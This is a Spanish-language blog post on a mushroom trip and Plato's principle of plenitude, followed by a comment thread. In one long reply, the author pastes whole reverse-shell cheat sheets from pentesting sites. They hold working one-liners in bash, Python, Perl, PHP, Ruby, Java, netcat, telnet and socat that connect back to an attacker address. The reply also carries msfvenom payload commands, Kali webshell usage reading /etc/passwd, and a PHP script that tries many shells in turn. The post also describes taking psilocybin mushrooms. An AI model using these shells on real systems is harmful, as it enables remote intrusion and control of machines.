Todas las potencias del Ser, Son: el Problema es la Elección.

.

A mí me lo contaron —entre muchísimas otras cosas que no es menester contar aquí— con una claridad prístina los Sagrados honguitos. Y, además, de esa forma tan gráfica, con la frasecita resonando hasta en las mismísimas cavidades de mi neocórtex:

.

TODAS LAS POTENCIAS DEL SER, SON.

.

 

https://i.imgur.com/SfZDXN0.jpg

30 gr. bien frehquitos de Copelandia (o Panaeolus) Cyanenscens, la especie más potente de honguitos que existe. La noche del 10 al 11 de Marzo de 2005. Causualmente, una de las dos fechas del nacimiento de Neo en Matrix.

.

#PROJECTMAYHEM2012 #INTYLERWETRUST

Qüeridos niños y niñas: no intentéis esto en casa.

.

.

Pues bien, años después, leyendo libritos de filosofía y demás zarandajas para tratar de escudriñar qué narices era aquello que me contaron los honguitos, me encuentro con que resúltase que se resulta que, como era de esperar, para nada era original mío sino que ya se le había ocurrido al cashondo de Platón en el Timeo, muchísimo antes que a mí. El CIENZUFO de Aristóteles sin embargo decía que nanai. Bueno, él sabría… 🙄

Verbigracia:

También conocido como

.

Principio de Plenitud.

.

https://en.wikipedia.org/wiki/Principle_of_plenitude

según Arthur Oncken Lovejoy y desarrollado con extensión en su libro The Great Chain of Being (1936).

https://i.imgur.com/wzO8ANV.jpg

.

The source is Arthur Lovejoy with his The Great Chain of Being: A Study of the History of an Idea (1936), page 50.

The reference is to Timaeus, 30c-d :

But we shall affirm that the Cosmos, more than aught else, resembles most closely that Living Creature of which all other living creatures, severally and generically, are portions. For that Living Creature embraces and contains within itself all the intelligible Living Creatures, just as this Universe contains us and all the other visible living creatures that have been fashioned. For since God desired to make it resemble most closely that intelligible Creature which is fairest of all and in all ways most perfect, He constructed it as a Living Creature, one and visible, containing within itself all the living creatures which are by nature akin to itself.

See Lovejoy, page 52 :

It is this strange and pregnant theorem of the’ fullness’ of the realization of conceptual possibility in actuality, that, in conjunction with two other ideas usually associated with it and commonly regarded as implied by it, is to be the principal topic of these lectures. It has, so far as I know, never been distinguished by an appropriate name; and for want of this, its identity in varying contexts and in different phrasings seems often to have escaped recognition by historians, I shall call it the principle of plenitude, but shall use the term to cover a wider range of inferences from premises identical with Plato’s than he himself draws; i. e., not only the thesis that the universe is a plenum formarum in which the range of conceivable diversity of kinds of living things is exhaustively exemplified, […].

 

 

Principio de Plenitud en Matrix: Todas las Potencias de Ser de Neo, Son.

el Problema es la Elección.

.

Y así parece Ser: cada vez que tomamos una decisión, estaríamos modificando el Universo en el que vivimos, maniobrando, cual si estuviéramos al timón de un barco, hacia otro Universo en el que la nueva situación ES POSIBLE. Diferentes Universos podrían perfectamente contener diferentes Leyes de la Física, en los cuales SERÍA POSIBLE cosas tan simpáticas como volar (Neo-style) o ser Bach o Jimi Hendrix. Mindfuckeante, eh? Je.

El misteriosísimo tema del Multiverso también va por ahí. Pero, especialmente, esta frasecita tan molona y PauloCoelhística:

.

Todo lo que puedas Imaginar, ES POSIBLE.

.

.

.

.
.
.

30 comentarios en “Todas las potencias del Ser, Son: el Problema es la Elección.

  1. El principio es interesante, sí. Y Tomás de Aquino lo trata con mucha enjundia.

    A mi me parece que tiene un problema, y es que parte de un presupuesto: el de la potencia. Las cosas, todas las cosas, se nos presentan primordialmente como actualidades, como actualizaciones “siendo” de suyo lo que “son”. Que a partir de ahí —ulteriormente— yo explique esas actualizaciones en términos de substancias que sostienen potencias, pues bien, vale, pero citeriormente se presentan como actualizaciones —ni si quiera como accidentes de una sustancia, por más que a algún tomista le rechine esto—, pero entonces habrá que pasarle la prueba del algodón de la modernidad a esta explicación del tot plegat: Descartes, Berkeley, etc…

    Fíjate, yo cuando tomé setas, 5.3 gramos nada menos, llegué a una conclusión más similar a la de Leibniz: un punto/mónada infinitamente pequeño, posible antes que existente, que contiene una pluralidad de mónadas que despliegan programáticamente en virtud del principio de no contradicción el mejor de los mundos posibles. O al menos eso interpreto yo, vaya ud. a saber…

    Sin duda, es imposible haber tomado setas y no interesarse por la metafísica después. Creo.

    Me gusta

    1. El principio es interesante, sí. Y Tomás de Aquino lo trata con mucha enjundia.

      A mi me parece que tiene un problema, y es que parte de un presupuesto: el de la potencia. Las cosas, todas las cosas, se nos presentan primordialmente como actualidades, como actualizaciones “siendo” de suyo lo que “son”. Que a partir de ahí —ulteriormente— yo explique esas actualizaciones en términos de substancias que sostienen potencias, pues bien, vale, pero citeriormente se presentan como actualizaciones —ni si quiera como accidentes de una sustancia, por más que a algún tomista le rechine esto—, pero entonces habrá que pasarle la prueba del algodón de la modernidad a esta explicación del tot plegat: Descartes, Berkeley, etc…

      no entiendo nada.

      Habrás observado que tanto el tono como la explicación de mi entrada son coloquiales. Si vas a Cataluña, estás en un círculo con 3 procones y se ponen a hablar entre ellos y/o contigo en catalán, estarán siendo unos maleducados, aunque lo más probable es que se les haya escapado sin querer. Si te pones tú a hablar con ellos en sebastopoleño, ya no es que estés siendo maleducado tú —que a lo mejor también— sino que es que te estás privando de congraciar con esos 3 procones tan majos: vamos, que estás haciendo el tonto.

      Si alguien que está interesado por la seguridad ofensiva me pregunta cómo se usa un shell inverso para obtener root en una máquina atacada, puedo comenzar por explicarle de forma muy coloquial y amena qué es el netcat.

      O bien puedo soltarle esto:

      Shells & Reverse

      Here’s how to upgrade your Linux reverse shell.
      python -c “import pty; pty.spawn(‘/bin/bash’)”

      You should get a nicer looking prompt, but your job isn’t over yet. Press Ctrl+Z to background your reverse shell, then in your local machine run:

      stty raw -echo
      fg

      Things are going to look really messed up at this point, but don’t worry.

      Just type reset and hit return. You should be presented with a fully interactive shell. You’re welcome.

      There’s still one little niggling thing that can happen, the shell might not be the correct height/width for your terminal. To fix this, go to your local machine and run:

      stty size

      This should return two numbers, which are the number of rows and columns in your terminal. For example’s sake let’s say this command returned 48 120 Head on back to your victim box’s shell and run the following.

      stty -rows 48 -columns 120

      You now have a beautiful interactive shell to brag about.

      Src: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

      ALSO (or the same):
      For the longest time when I got reverse shells I would suffer through using non-interactive shells until I learned about upgrading to interactive shells from IppSec:
      python -c ‘import pty;pty.spawn(“/bin/bash”);’
      CTRL-Z
      stty raw -echo
      fg
      ENTER
      Src: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

      Netcat
      NOTE: Most versions of netcat don’t have -e built-in
      If you’re not sure what -e does, it lets you specify a command to pipe through your reverse shell. There’s a good reason that it’s disabled on most versions of netcat — it’s a gaping security hole. Having said that, if you’re attacking a linux machine, you can get around this by using the following reverse shell one-liner.

      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

      Which will pipe /bin/sh back to 10.0.0.1 on port 1234, without using the -e switch. This brings us to the next section nicely:

      Src: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

      This brings us to the next section nicely:

      A collection of Linux reverse shell one-liners

      These one-liners are all found on pentestmonkey.net. This website also contains a bunch of other useful stuff!

      Bash

      bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

      Perl

      perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

      Python

      python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

      PHP

      php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i &3 2>&3”);’

      Ruby

      ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i &%d 2>&%d”,f,f,f)’

      Netcat with -e

      nc -e /bin/sh 10.0.0.1 1234

      Netcat without -e (my personal favourite)

      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

      Java

      r = Runtime.getRuntime()
      p = r.exec([“/bin/bash”,”-c”,”exec 5/dev/tcp/10.0.0.1/2002;cat &5 >&5; done”] as String[])
      p.waitFor()

      Src: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

      Breaking Out of Limited Shells
      Credit to G0tmi1k for these (or wherever he stole them from!).
      The Python trick:
      python -c ‘import pty;pty.spawn(“/bin/bash”)’
      echo os.system(‘/bin/bash’)
      /bin/sh -i
      Src: https://highon.coffee/blog/linux-commands-cheat-sheet/

      Src: https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

      #1. netcat

      Surprise!!! Nothing new here. Plain and simple. Fire up a listener on the attacker machine on a port which is reachable from the target and connect back to the listener with netcat. Looks like this.

      images\1-1.png

      #2. netcat with GAPING_SECURITY_HOLE disabled:

      This is a little trick that Ed Skoudis tweeted about in November of last year, but I haven’t seen it widely publicized. It is based on the common technique used to build netcat relays. When the GAPING_SECURITY_HOLE is disabled, which means you don’t have access to the ‘-e’ option of netcat, most people pass on using netcat and move to something else. Well this just isn’t necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat. Sounds confusing right? The following image should clear things up.

      images\1-2.png

      #3. netcat without netcat:

      I love “hacks” that use features of the operating system against itself. This is one of those “hacks”. It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It’s not always available, but can be quite handy when it is.

      images\1-3.png

      #4. netcat without netcat or /dev/tcp:

      /dev/tcp not available either? Just use telnet with technique #2.

      images\1-4.png

      #5. telnet-to-telnet:

      I’m not sure why you’d use this technique, but it’s an option, so here it is nonetheless. This is clearly the ugliest of the techniques. This technique uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash, and pipe the output to the second telnet session. Commands are entered into one the of the attackers listeners and feedback is received on the other.

      images\1-5.png

      #6. RCE shell:

      On this one I’m cheating a little bit. This applies to Remote Command Execution vulnerabilities only. Rather than manually enter commands into a proxy or browser url, I wrote small python script which gives you the feel of a shell, without spawning anything in reverse from the target. You merely pass the script the vulnerable url with the injectable field replaced with the ” tag and it presents you with a clean interface for entering commands. In the background, the script is making the request to the web server, parsing the response, and presenting it to you.

      images\1-6.png

      #7. PHP reverse shell via interactive console:

      The last technique makes use of the php interactive console. The attacker issues one command which moves to the /tmp directory (because it is typically world writable), uses wget to download a malicious php reverse_tcp backdoor (which the attacker hosts on a web server that he controls), and executes the backdoor via the interactive console.

      images\1-7.png

      #1
      nc -e /bin/bash
      #2
      mknod backpipe p; nc 0backpipe
      #3
      /bin/bash -i > /dev/tcp// 0&1
      #4
      mknod backpipe p; telnet 0backpipe
      #5
      telnet | /bin/bash | telnet
      #7
      wget -O /tmp/bd.php && php -f /tmp/bd.php

      Src: https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

      Src: https://highon.coffee/blog/reverse-shell-cheat-sheet/

      During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.
      Below are a collection of reverse shells that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.
      If you found this resource usefull you should also check out our penetration testing tools cheat sheet which has some additional reverse shells and other commands useful when performing penetration testing.

      Setup Listening Netcat

      Your remote shell will need a listening netcat instance in order to connect back.

      Set your Netcat listening shell on an allowed port

      Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
      To setup a listening netcat instance, enter the following:
      root@kali:~# nc -nvlp 80
      nc: listening on :: 80 …
      nc: listening on 0.0.0.0 80 …
      NAT requires a port forward

      If you’re attacking machine is behing a NAT router, you’ll need to setup a port forward to the attacking machines IP / Port.
      ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).

      Bash Reverse Shells

      exec /bin/bash 0&0 2>&00<&196;exec 196/dev/tcp/ATTACKING-IP/80; sh &196 2>&196exec 5/dev/tcp/ATTACKING-IP/80
      cat &5 >&5; done

      # or:

      while read line 0&5 >&5; donebash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
      PHP Reverse Shell

      A useful PHP reverse shell:
      php -r ‘$sock=fsockopen(“ATTACKING-IP”,80);exec(“/bin/sh -i &3 2>&3″);’
      (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)
      Netcat Reverse Shell

      Useful netcat reverse shell examples:
      nc -e /bin/sh ATTACKING-IP 80/bin/sh | nc ATTACKING-IP 80rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
      Telnet Reverse Shell

      rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/ptelnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443Remember to listen on 443 on the attacking machine also.

      Perl Reverse Shell

      perl -e ‘use Socket;$i=”ATTACKING-IP”;$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
      Perl Windows Reverse Shell

      perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”ATTACKING-IP:80″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while;’perl -e ‘use Socket;$i=”ATTACKING-IP”;$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
      Ruby Reverse Shell

      ruby -rsocket -e’f=TCPSocket.open(“ATTACKING-IP”,80).to_i;exec sprintf(“/bin/sh -i &%d 2>&%d”,f,f,f)’
      Java Reverse Shell

      r = Runtime.getRuntime()
      p = r.exec([“/bin/bash”,”-c”,”exec 5/dev/tcp/ATTACKING-IP/80;cat &5 >&5; done”] as String[])
      p.waitFor()
      Python Reverse Shell

      python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKING-IP”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
      Gawk Reverse Shell

      #!/usr/bin/gawk -f

      BEGIN {
      Port = 8080
      Prompt = “bkd> ”

      Service = “/inet/tcp/” Port “/0/0”
      while (1) {
      do {
      printf Prompt |& Service
      Service |& getline cmd
      if (cmd) {
      while ((cmd |& getline) > 0)
      print $0 |& Service
      close(cmd)
      }
      } while (cmd != “exit”)
      close(Service)
      }
      }
      Kali Web Shells

      The following shells exist within Kali Linux, under /usr/share/webshells/ these are only useful if you are able to upload, inject or transfer the shell to the machine.

      Kali PHP Web Shells

      Kali PHP reverse shells and command shells:
      Command Description
      /usr/share/webshells/php/ php-reverse-shell.php Pen Test Monkey – PHP Reverse Shell
      /usr/share/webshells/ php/php-findsock-shell.php /usr/share/webshells/ php/findsock.c Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
      /usr/share/webshells/ php/simple-backdoor.php PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple- backdoor.php?cmd=cat+/etc/passwd
      /usr/share/webshells/ php/php-backdoor.php Larger PHP shell, with a text input box for command execution.

      Tip: Executing Reverse Shells

      The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

      Kali Perl Reverse Shell

      Kali perl reverse shell:
      Command Description
      /usr/share/webshells/perl/ perl-reverse-shell.pl Pen Test Monkey – Perl Reverse Shell
      /usr/share/webshells/ perl/perlcmd.cgi Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

      Kali Cold Fusion Shell

      Kali Coldfusion Shell:
      Command Description
      /usr/share/webshells/cfm/cfexec.cfm Cold Fusion Shell – aka CFM Shell

      Kali ASP Shell

      Classic ASP Reverse Shell + CMD shells:
      Command Description
      /usr/share/webshells/asp/ Kali ASP Shells

      Kali ASPX Shells

      ASP.NET reverse shells within Kali:
      Command Description
      /usr/share/webshells/aspx/ Kali ASPX Shells

      Kali JSP Reverse Shell

      Kali JSP Reverse Shell:
      Command Description
      /usr/share/webshells/jsp/jsp-reverse.jsp Kali JSP Reverse Shell

      Src: https://highon.coffee/blog/reverse-shell-cheat-sheet/

      Src: https://evi1us3r.wordpress.com/reverse-shell-cheat-sheet/

      Reverse Shell Cheat Sheet

      Netcat:
      nc 192.168.1.10 443 -e /bin/bash
      /bin/sh | nc 192.168.1.10 443
      rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.10 443 0/tmp/p
      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
      Bash:
      bash -i >& /dev/tcp/192.168.1.10/443 0>&1
      /bin/bash -i > /dev/tcp/192.168.1.10/443 0&1
      0<&196;exec 196/dev/tcp/192.168.1.10/443; sh &196 2>&196
      exec 5/dev/tcp/192.168.1.10/443
      cat &5 >&5; done
      exec 5/dev/tcp/192.168.1.10/443
      cat <&5 | while read line 0&5 >&5; done
      Python:
      python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.10”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
      Perl:
      *nix:
      perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
      Windows:
      perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”192.168.1.10-IP:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while;’
      perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
      PHP:
      php -r ‘$sock=fsockopen(“192.168.1.10”,443);exec(“/bin/sh -i &3 2>&3”);’
      Ruby:
      ruby -rsocket -e’f=TCPSocket.open(“192.168.1.10”,443).to_i;exec sprintf(“/bin/sh -i &%d 2>&%d”,f,f,f)’
      Windows
      ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
      Java:
      r = Runtime.getRuntime()
      p = r.exec([“/bin/bash”,”-c”,”exec 5/dev/tcp/192.168.1.10/443;cat &5 >&5; done”] as String[])
      p.waitFor()
      Telnet:
      rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.10 443 0/tmp/p
      telnet 192.168.1.10 443 | /bin/bash | telnet 192.168.1.10 443

      Src: https://evi1us3r.wordpress.com/reverse-shell-cheat-sheet/

      Ejecutar comandos con privilegios de usuarios sin shell (nologin / false)

      Usuarios sin shell (nologin).
      grep -i nologin /etc/passwd

      bin:x:1:1:bin:/bin:/sbin/nologin
      daemon:x:2:2:daemon:/sbin:/sbin/nologin
      apache:x:48:48:Apache:/var/www:/sbin/nologin
      ntp:x:38:38::/etc/ntp:/sbin/nologin

      Ejecutar shell con el usuario apache (configurado con nologin).
      su -s /bin/bash apache

      bash-4.1$ id
      uid=48(apache) gid=48(apache) groups=48(apache)

      Src: https://www.busindre.com/comandos_como_usuarios_sin_shell_nologin

      Breaking out of shells

      • Non-interactive shells
      to break out of non-interactive mode: in /tmp folder
      echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/test.py
      python /tmp/test.py
      • upgrade non-tty to tty: python -c ‘import pty;pty.spawn(“/bin/sh”)’
      • Escape limited shell
      echo os.system(‘/bin/sh’) OR echo os.system(‘/bin/bash’)

      Kali webshells
      • /usr/share/webshells/php/php-reverse-shell.php
      • /usr/share/webshells/cfm/cfexec.cfm
      • /usr/share/webshells/perl/perl-reverse-shell.pl

      ASP
      msfvenom -p windows/shell_reverse_tcp LHOST=192.168.168.168 LPORT=443 -f asp -o shell.asp – also works for exporting .aspx

      Reverse connections
      • echo $secpasswd = ConvertTo-SecureString “password” -AsPlainText -Force > wget-runas.ps1
      echo $mycreds = New-Object System.Management.Automation.PSCredential (“username”, $secpasswd) >> wget-runas.ps1
      echo $computer = “hostname” >> wget-runas.ps1
      echo [System.Diagnostics.Process]::Start(“C:\tmp\nc.exe”,”192.168.168.168 443 -e cmd.exe”, $mycreds.Username, $mycreds.Password, $computer) >> wget-runas.ps1
      powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget-runas.ps1
      • Linux: os.system(‘nc 192.168.168.168 443 -e /bin/sh’)
      • Windows: nc -nlvp 443 -e cmd.exe

      Src: https://blackwintersecurity.com/tools/

      PHP
      Reverse shells
      • One line: /bin/bash -i > /dev/tcp/192.168.168.169/443 0&1
      • MSFvenom syntax: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.168.168 LPORT=443 R > revshell.php

      Src: https://blackwintersecurity.com/tools/

      Execution through PHP webshell





      Shell reversa / inversa mediante una conexión cifrada con socat
      Host que espera la conexión de la shell reversa (atacante):

      openssl req -sha512 -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem
      socat `tty`,raw,echo=0 openssl-listen:1999,reuseaddr,cert=cert.pem,verify=0

      Host que envía la shell al servidor del atacante (X.X.X.X):

      socat openssl-connect:X.X.X.X:1999,verify=0 exec:bash,pty,stderr,setsid

      Src: https://www.busindre.com/shell_reversa_cifrada_con_socat

      Best PHP Reverse Shell (from Guifre):

      /dev/tcp/’.$ip.’/’.$port.’ 0&1′,
      ‘0<&196;exec 196/dev/tcp/’.$ip.’/’.$port.’; /bin/sh &196 2>&196′,
      ‘/usr/bin/nc ‘.$ip.’ ‘.$port.’ -e /bin/bash’,
      ‘nc.exe -nv ‘.$ip.’ ‘.$port.’ -e cmd.exe’,
      “/usr/bin/perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\””.$ip.”:”.$port.”\”);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while;'”,
      ‘rm -f /tmp/p; mknod /tmp/p p && telnet ‘.$ip.’ ‘.$port.’ 0/tmp/p’,
      ‘perl -e \’use Socket;$i=”‘.$ip.'”;$p=’.$port.’;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};\”
      );
      foreach ($reverse_shells as $reverse_shell) {
      try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
      try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
      try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
      }
      system(‘id’);
      ?>

      ¿Se entiende mejor así? 🙄

      Por lo demás: el principio de no contradicción junto con el de tercero excluido del CIENZUFO de Aristóteles son la mayor catástrofe de la historia del “pensamiento” occidental. Opinodeque. No en vano a védicos, budistas y zen(tollos) la Ciencia siempre se les ha traído al pairo.

      Desde tu racionalística-calíxtica (i)lógica es IMPOSIBLE que admitas siquiera la experiencia de esa simpatiquísima UNIDAD BI-POLAR llamada Tao: y eso que te pierdes. 😛

      Dicho lo cualo, aaaay amigo, fíate tú de las setas… 😆

      Me gusta

        1. … tengo que venir con el diccionario de nigromante para pillar las palabras pares. Las impares ni con diccionario.

          Jajajjaja… algo escribió machado de lo claro y lo oscuro. ¡Celebro leerte! ¡Fear of the pepinos!

          Gallardo.

          P.D.: Me gusta cuando, en la correlación de fuerzas, se abandona el discurso para pasar a la telebasura y criticar por fuera, hablando superficialmente del autor o de aspectos subjetivos, de modo y manera tal que el show prosiga y el tertuliano tras soltar su mierda abandona el plató ancho y pancho. Bien está. Salvo dos o tres neologimos que debidamente marco con el sic pertinente, no escribo nada que no salga o devenga caso de que se siguiera trabajando y actualizando como hizo María, en el de Moliner. :-DD

          P.D.2: Ganesh, tengo (o la tiene Nosce) una versión completa de la base de datos de la orden del dragón y de gea: ¿quieres que hagamos un libro a cuatro manos sacando lo mejor? Te pongo un enlace.

          jajajajaj

          P.D.3:

          Te pongo una secuencia de cuatro fotos. En la última falta el subtítulo. ¿Quién adivina qué pregunta la star de trap?:




          .
          .
          .
          .
          .
          .
          .
          .
          .
          .
          . Solución:
          Pero… ¿vosotros lo entendéis? ¿en serio?

          P.D.4: Correr los cien metros lisos o hacer maratón es lo mismo pero cambia completamente. Tú me entiendes, Nosce. ¿Sprint de 8 segundos o marcha de varias horas? Y, tú, lector, qué eres: ¿corredor de fondo o sprinter? ¿Ambos?

          P.D.6: Acepto que la hipomanía y, en general, la ascención de la hiperia en el cerebro pueda parecerse a lo contrario de forjar un nirvana como espacio de trabajo “sin viento” en el que puede operarse con atención plena.

          Y me pregunto si existe un estado permanente de samadhi en lo relativo “al balance constante”, saltando homemorfía desde el territorio de lo religioso al territorio psíquico, de la hiperia.

          Esto es, ¿puede activarse el 99% de nuestras potencias y permanecer operativos sin que tal estado de gran activación nos suponga un pepino para nuestra gatuna naturaleza?

          😀 Happy Thanks giving day!

          Me gusta

      1. ¿Se entiende mejor así? 🙄

        Thanks!!!!!!!!!!!!! Si entiendo cómo entrar en una máquina entiendo cómo defender las mías. Gold!

        Martín

        P.D.: Entiendo que el tutorial que has publicado pueda molestar a un gran número de lectores. Quizás el 1% lo agradezca. A este 1% por se la sudará cómo presentes el código en el lienzo de este blog. Pero, estoy seguro, el 99% restante, que no apreciará la utilidad ni la propia sustancia (para el copy paste va perfecto así como está, en raw), agradecerá esto: ta chan! Someone needs a pretty-code plugin?

        https://rawgit.com/google/code-prettify/master/styles/index.html

        P.D.2: Sobre la correlación de fuerzas y para una tesis de la escuela de moderadores de tertulias y admins de foros:

        Por lo demás: el principio de no contradicción junto con el de tercero excluido del CIENZUFO de Aristóteles son la mayor catástrofe de la historia del “pensamiento” occidental. Opinodeque. No en vano a védicos, budistas y zen(tollos) la Ciencia siempre se les ha traído al pairo.

        y el principio de identidad, una de las leyes clásicas del pensamiento.*

        Robert Audi (ed.). «laws of thought». The Cambridge Dictionary of Philosophy (en inglés) (2nd edition edición). Cambridge University Press.​

        P.D.3: Jasso, Nosce, Ganesh, y resto de frecuentes al hilo de comentarios de este templo (que nada tiene que envidiarle (solo que le faltan los patrocinadores que lo mantengan a flote (llámalo patrocinador llámalo mecenas)) al espacio de los viernes de Wismichu): ¿Quieren formar una banda? ¡Podríamos armar el procón elenco de los guerreros del pensamiento!

        Me gusta

    2. Que a partir de ahí —ulteriormente— yo explique esas actualizaciones en términos de substancias que sostienen potencias, pues bien, vale, pero citeriormente se presentan como actualizaciones —ni si quiera como accidentes de una sustancia, por más que a algún tomista le rechine esto—, pero entonces habrá que pasarle la prueba del algodón de la modernidad a esta explicación del tot plegat: Descartes, Berkeley, etc…

      ¿Como diciendo que la potencia no existe porque nada que exista fuera de la bolita entre los dos conos puede existir?

      Jasso, creo que ese argumento presupone que no existe algo tal que la gametogénesis. Puede que no tengas puta idea de autopoiesis. Ho sento, però algú ho havia de dir. :-DDDDDD

      https://www.google.com/search?q=espacio-tiempo+de+Minkowski

      …una pluralidad de mónadas que despliegan programáticamente en virtud del principio de no contradicción el mejor de los mundos posibles.

      Totalmente de acuerdo. Perdona un momento, como en la foto de abajo, voy a pensar para mí un segundo…

      Me gusta

      1. ¿Como diciendo que la potencia no existe porque nada que exista fuera de la bolita entre los dos conos puede existir?

        No he querido decir eso. Lo que intento describir es que en la aprehensión más primordial que tenemos de las cosas no hay potencias “detrás” de esas realidades. Que el verde de las notas aprehendidas de un árbol puedan (i.e., que estén en potencia de) ser rojas es algo ulterior reflexionado a partir de la impresión dada por el sistema de notas verdes de un árbol en el acto de ver. Eso no significa, evidentemente, que la realidad de la cosa aprehendida se agote ahí. Es decir: que sí hay más cera que la que arde, y es lo que me permite explicar, a partir de esa aprehensión primordial, todo lo que hay “más allá”, como pueden ser el ser o el existir del árbol, un sujeto que percibe y un objeto “arbóreo”, o las realidades que me explica la química orgánica del árbol.

        Me gusta

        1. No he querido decir eso. Lo que intento describir es que en la aprehensión más primordial que tenemos de las cosas no hay potencias “detrás” de esas realidades.

          Entonces, quizás, según entiendo, en tu argumento, me sugiere, habría un problema de solipsismo.

          Ya que en lugar de considerar que el verde de una hoja tiene lugar por causa de la cantidad de clorofila que contiene el ser vegetal estamos interpretando tal cuestión según la percepción del observador y su capacidad óptica.

          Dicho de otro modo, más sencillo, ¿son los alelos la determinación de la potenica de un ser?

          Me daría miedo escucharte aseverar que un daltónico podría alterar la “potencia” de una planta según él viera los verdes y los rojos.

          Las células de las plantas tienen tres juegos diferentes de ADN: por un lado la célula tiene su propio genoma en su núcleo, por otro las mitocondrias tienen su propio genoma (1 cromosoma continuo) y por otro los cloroplastos tienen su propio genoma (1 cromosoma continuo)

          Dicho de otro modo, si yo puedo determinar los alelos que tiene un ser, ¿acaso no puedo determinar qué resultado tendrá la consumación de su potencia?

          😀

